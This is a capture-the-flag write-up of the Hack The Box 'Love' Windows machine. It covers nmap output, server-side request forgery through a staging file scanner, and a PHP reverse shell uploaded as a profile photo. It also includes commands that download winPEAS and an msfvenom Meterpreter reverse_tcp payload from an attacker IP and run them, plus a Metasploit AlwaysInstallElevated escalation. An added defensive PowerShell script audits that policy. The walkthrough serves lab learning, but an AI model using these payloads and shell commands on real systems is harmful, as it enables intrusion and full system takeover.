Nmap Scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| TLSSessionReq:
|_ Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/2%Time=608E1783%P=x86_64-pc-linux-gnu%r(TLS
SF:SessionReq,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.7'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/2%OT=80%CT=1%CU=37207%PV=Y%DS=2%DC=T%G=Y%TM=608E17CB
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10F%TI=I%CI=I%II=I%SS=O%TS=U)
OS:SEQ(SP=FA%GCD=1%ISR=10F%CI=I%II=I%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O
OS:3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=
OS:FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%
OS:Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F
OS:=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%
OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=250 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h42m14s, deviation: 4h02m30s, median: 22m13s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-01T20:30:44-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-02T03:30:48
|_ start_date: N/A
Enumeration
Subdomain found: staging.love.htb
Port 80: love.htb
A login page. I tried default credentials and some basic SQL injections, but they did not work,
so let's visit the subdomain.
staging.love.htb
A file scanner? OK, let's give this file scanner our reverse shell to get a reverse shell, but
I tried and it did not work;
I didn't get a shell back.
After analyzing the nmap results, I found that port 5000 (an unusual port) is open,
but it returns 403 Forbidden,
so we use the file scanner (http://staging.love.htb/beta.php) to access port 5000.
Boom!! We got the admin credentials for love.htb/admin.
We are now admin.
INITIAL SHELL
There are lots of ways to get a reverse shell; I uploaded my shell as a profile photo, but you can also upload it via the voter, candidate, voter list, etc. forms...
Note that it is a Windows machine, so the usual Linux PHP shell doesn't work; I used
this shell: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/minified/php_reverse_shell_mini.php, or you can use the Nishang shell instead.
Steps to upload the shell
Cool :)
USER.TXT
Privilege escalation
Transfer winPEAS.exe to the victim machine for analysis (simple PowerShell one-liner):
Invoke-WebRequest "http://10.10.14.4/winPEAS.exe" -OutFile winpeas.exe
.\winpeas.exe
AlwaysInstallElevated is enabled?
What is this?
As we all know, Windows comes with the Windows Installer engine, which MSI packages use to install applications. These MSI packages can be installed with elevated privileges by non-admin users.
For this purpose, the AlwaysInstallElevated policy is used to install an MSI package file with elevated (SYSTEM) privileges. This policy is enabled in the Local Group Policy Editor; it directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This setting makes a machine vulnerable and poses a high security risk, because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.
Caution note: this option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence it should be used for lab purposes only (and not in a production environment). (source)
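As an added example (not part of the original writeup), the following PowerShell audits this policy from the defender's side. The policy only takes effect when both the machine (HKLM) and user (HKCU) values are set to 1, so the script checks both, reports whether the combination is exploitable, and then lists recent Windows Installer events from the Application log so that unexpected MSI installs can be reviewed. The registry paths and event IDs are standard Windows ones; the function name and output layout are my own and nothing here is specific to the Love machine.

```powershell
# Added example (not from the original writeup): audit the AlwaysInstallElevated policy.
# The policy is only effective when BOTH the HKLM and HKCU values are 1, so both are checked.

function Get-AlwaysInstallElevatedState {
    $paths = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in $paths.Keys) {
        $value = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value means the policy is not configured, which behaves like 0
        $state[$scope] = if ($null -ne $value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        MachinePolicy = $state.Machine
        UserPolicy    = $state.User
        # Exploitable only when both values are set
        Exploitable   = ($state.Machine -eq 1 -and $state.User -eq 1)
    }
}

$result = Get-AlwaysInstallElevatedState
$result | Format-List

if ($result.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is fully enabled: any user can install MSI packages as SYSTEM.'
    # Remediation: disable the policy in both scopes. On domain-joined hosts use Group Policy:
    # Computer Configuration / User Configuration > Administrative Templates > Windows Components
    # > Windows Installer > "Always install with elevated privileges" = Disabled.
    # Local equivalent (run as an administrator):
    # Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
    # Set-ItemProperty -Path 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
}

# Detection: Windows Installer records completed installs in the Application log under the
# MsiInstaller provider (event 1033 "installed the product", 11707 "Installation completed
# successfully"). An MSI installed by a non-admin account under this policy appears here,
# so review recent entries and the account (UserId) that triggered each install.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, UserId, Message |
    Format-Table -AutoSize -Wrap
```

Run it in an ordinary (non-elevated) PowerShell session to see what a standard user would be able to exploit; the registry read needs no special rights, while the Set-ItemProperty remediation lines in the comments require administrator rights for the HKLM value.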
ROOT.TXT
STEPS TO BECOME ADMINISTRATOR
First we need a Meterpreter shell, so let's create an msfvenom payload, then transfer it to the victim machine to get a Meterpreter session.
(command)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9001 -f exe -o reverse.exe
Then upload the payload via a Python web server.
(download command, run on the victim)
Invoke-WebRequest "http://10.10.14.8:8000/reverse.exe" -OutFile reverse.exe
(Then start the msfconsole listener)
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.8; set lport 9001; exploit"
Trigger the shell: .\
In order to perform privilege escalation abusing the AlwaysInstallElevated policy, we can use the built-in Metasploit module as follows:
Then,
use exploit/windows/local/always_install_elevated
msf exploit(always_install_elevated) > set session 1
msf exploit(always_install_elevated) > set lhost <your tun0ip>
msf exploit(always_install_elevated) > exploit
Hurrah!! We have rooted the Love machine (NT AUTHORITY\SYSTEM), which has the highest level of privileges on the local system.
LOVE PWNED :)
L for Lateral
O for Offensive
V for Vulnerability
E for Escalation